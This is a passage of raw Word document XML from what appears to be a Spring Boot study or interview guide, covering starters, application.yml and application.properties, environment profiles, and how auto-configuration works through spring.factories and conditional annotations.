          <w:p w14:paraId="63490B3C"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s Spring Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w14:paraId="10D23075" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="183563F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 libraries (JUnit, Mockito, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w14:paraId="2757A2B6" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A99C2C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mplate engine for web views</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w14:paraId="00F5F3F0" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6809ED24"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and metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="769BF2B6"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492" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB169F" w14:textId="1212A1FA"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34DE9"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F5FA35C" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00944A46">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starters follow the naming convention:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>spring-boot-starter-&lt;feature&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530AD2D8"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493" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631811C" w14:textId="798EC3EC" w:rsidR="00010198" w:rsidRPr="00CE4B95" w:rsidRDefault="00010198">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="586" w:name="_Toc197867800"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a yaml file in SpringBoot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="586"/>
    </w:p>
    <w:p w14:paraId="28E88A3C" w14:textId="46B5CCA8" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90" w:rsidP="00C6035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oot, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>YAML file</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (application.yml) is an alternative to the traditional application.properties file. It's used to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>application configuration</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hierarchical and readable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BDC6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494" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E13A652"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YAML?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E09380"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and more structured than properties files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8744C7"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nested configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, arrays, and environment profiles more elegantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6677BC"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495" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA6C55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YAML File Name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727BADF0" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90" w:rsidP="00CF15E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application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCB2A6"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496" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE317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yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322DC6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212A459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6DBD6F2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5EF4B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0DE71D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0C1ED6A"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gre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5432/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABDF11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yuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D6192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378FD04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jpa</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2336D95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hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3D91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d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u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pdate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771287C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CEFE71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81125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04A90A7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level</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5E3BD0" w14:textId="6A0ADE81"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6700D301"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497" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ABAD33"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Profiles (Environment-based Configs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FCA4F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5527E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p>
    <w:p w14:paraId="38D11D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acti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496CC70C"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1CF69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CF9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7B5D31"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2B317F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1BAA24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94E26E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devdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7636C01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2D73DBD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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C69F6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DFE6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5575499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4610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4A59F33F"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7D5A53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5A2FBC9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prod-server:3306/proddb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7463D5A2"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F79AD6A" w14:textId="3CA3F0FE"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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F948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498" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C022BFA"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YAML in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5DF85A"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indentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (spaces, not tabs!) for hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420D6911"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multiple documents</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> separated by ---.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178478E3"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499" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F210F8" w14:textId="6B0CE4AD" w:rsidR="008156C3" w:rsidRPr="00CE4B95" w:rsidRDefault="008156C3" w:rsidP="008156C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="587" w:name="_Toc197867801"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is application.properties or application.yml used for?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="587"/>
    </w:p>
    <w:p w14:paraId="6595365F" w14:textId="02BFC868" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00E023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pplication.properties and application.yml are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configuration files</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot. They're used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>define application setting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ternalize configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, so you can change behavior without touching Java code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2853BCE5"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500" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8263A0"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Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3834C11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configure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> things like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADFC879"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 port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561AAA3D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5801CFA8"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levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588856A4"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settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170C007"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application variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8375FA"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 (dev/test/prod)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1751E2D2"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rd-party integrations (Kafka, Mail, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B775FEA"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501" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA774BD"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properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589CBD5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81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1017C78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7B4E96F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p>
    <w:p w14:paraId="1101F3B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ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1100CFEC" w14:textId="6D03D482"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v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FO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803079B"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502" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0747A53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ame Example in application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409998F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5F8EB8D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0155D9E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95964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spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2614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44ADD6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271C6E85"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ot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C89D5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1348CED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34362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4D0EF99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level</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7318A6C1" w14:textId="5744C1B1"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C66118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CE4B95" w14:paraId="070C79E2" w14:textId="77777777" w:rsidTr="00A75DC8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02BB5EA9"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tc>
      </w:tr>
      <w:tr w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w14:paraId="0A06FBB4" w14:textId="77777777" w:rsidTr="00A75DC8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04AC8C3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erarchical &amp; structured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w14:paraId="7882DCFB" w14:textId="77777777" w:rsidTr="00A75DC8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48F2D246"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for nested structures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w14:paraId="2B25AC5A" w14:textId="77777777" w:rsidTr="00A75DC8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F6471B5"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profile handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F51C51F"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503" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F041A97" w14:textId="47CE0BA9"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73617"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B7CF50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either</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A8060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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A8BF9"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504" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62380313" w14:textId="06CCF762"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88" w:name="_Toc197867802"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring Boot auto-configuration work?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="588"/>
    </w:p>
    <w:p w14:paraId="19DADF19" w14:textId="5181F9EE" w:rsidR="008C4546" w:rsidRPr="00CE4B9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Spring Boot Auto-Configuration work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D88B66"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505" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF8DAD7"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Simple Terms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF01C8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506" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2983FD65"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mponents That Make It Work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CD4AC"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eAutoConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6697A12D"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 of @SpringBootApplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620F1B41"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ells Spring Boot to start auto-configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B2EF50"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s @EnableAutoConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B93A93B"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CFF5C1"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13C53A"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4C823349"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426993" w14:textId="781F3FDC"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FD55FEE"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507" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CE0EDE"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und inside the Spring Boot JARs (like spring-boot-autoconfigure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736E84A"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all the auto-configuration classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA91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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># META-INF/spring.factories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63594ED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abl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433AAA8"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26F39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e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l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WebMvc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C08C95" w14:textId="1C0E9BEF"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C7E0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508" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4C1D86"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ditional Annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161579F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only configures what you need, using annotations like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F5D6B8"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Class → If a class is on the classpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023B3BB2"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MissingBean → Only create if a bean is missing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356DCFE4"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xample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A07D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794531A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ditionalOn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E8E2EA7"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A0A0F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s up a DataSource bean if JDBC is on the classpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8B7B83" w14:textId="4C79A3D1"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A83567"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509" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B157A98"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in Action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D12A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is dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C1695A" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00633FD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spring-boot-starter-web'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F3954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p w14:paraId="66B3DBF4"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Spring MVC is needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D09FAD5"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es:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E87308"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A91AF7B"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5205D6A7"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45089DC2"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error pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7698F430"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64DCD809"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without you writing any config!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758C231"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510" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="731E7B0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You Override Auto-Config?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361F82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You can override it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AF1AD"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your own @Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57964227"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ditionalOnMissingBean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A74B6DF"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specific auto-configs using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D3206" w14:textId="70DA7363" w:rsidR="00C16412" w:rsidRPr="00CE4B95"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clu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3D2386D6"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511" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F8904B"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CE4B95" w14:paraId="79DCCA5D" w14:textId="77777777" w:rsidTr="00FF7345">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58C44AD6"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FF7345" w:rsidRPr="00CE4B95" w14:paraId="4F41E484" w14:textId="77777777" w:rsidTr="00FF7345">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="264C529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auto-configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w14:paraId="1F0296DA" w14:textId="77777777" w:rsidTr="00FF7345">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DE8690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config classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w14:paraId="1B23A7D9" w14:textId="77777777" w:rsidTr="00FF7345">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4161DE1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 when config should apply</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w14:paraId="4B828776" w14:textId="77777777" w:rsidTr="00FF7345">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41EADED0"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path + Config + Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="699397F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512" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
